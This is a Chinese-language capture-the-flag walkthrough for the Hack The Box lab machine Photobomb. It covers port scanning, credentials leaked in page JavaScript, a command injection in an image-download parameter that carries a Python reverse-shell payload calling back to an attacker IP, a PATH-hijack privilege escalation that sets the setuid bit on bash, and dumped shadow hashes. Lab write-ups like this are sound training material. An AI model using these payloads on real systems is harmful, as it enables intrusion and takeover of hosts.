基本信息

端口扫描

22,80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nmap -sC -sV -Pn 10.10.11.182
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-12 10:25 CST
Nmap scan report for 10.10.11.182
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

需要加hosts

1
10.10.11.182 photobomb.htb

photobomb.htb

页面JS中可以得到账号密码:

1
pH0t0 : b0Mb!

登录进去可以看到很多图片:

命令注入

有一个下载图片用于打印的功能,filetype参数注入:

1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.4%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'&dimensions=3000x2000

user flag

得到的shell就是user:

提权信息

查看sudo,发现可运行的一个sh文件中,cp和find命令没有使用绝对路径:

所以就是普通的环境变量劫持:

提权 & root flag

可以先写个公钥ssh进去方便操作,因为cd是built-in command,所以需要劫持find才会生效(一个小细节):

1
2
3
cd /tmp
echo "chmod +s /bin/bash" > /tmp/find
sudo PATH=/tmp:$PATH /opt/cleanup.sh

shadow

1
2
root:$6$7MU2U.CeiY0WX91P$TUNn8zNu/XUPSgURRJbzYvnnawpZdGhsWiLSpVrm1cIx9Rev7V/yQ5x58gTy98zcXrv6RqlWRtXcbhEhTl3240:19251:0:99999:7:::
wizard:$6$qmjmqNE6eDSugXXx$KSXyEnRqlVcnAOT9iqxGRsrwnakYHAlF8mNMpEE75i3ZHA0T23OVnedmK3rbaw2gMFbLekluAtgByD/mySzsy1:19077:0:99999:7:::

参考资料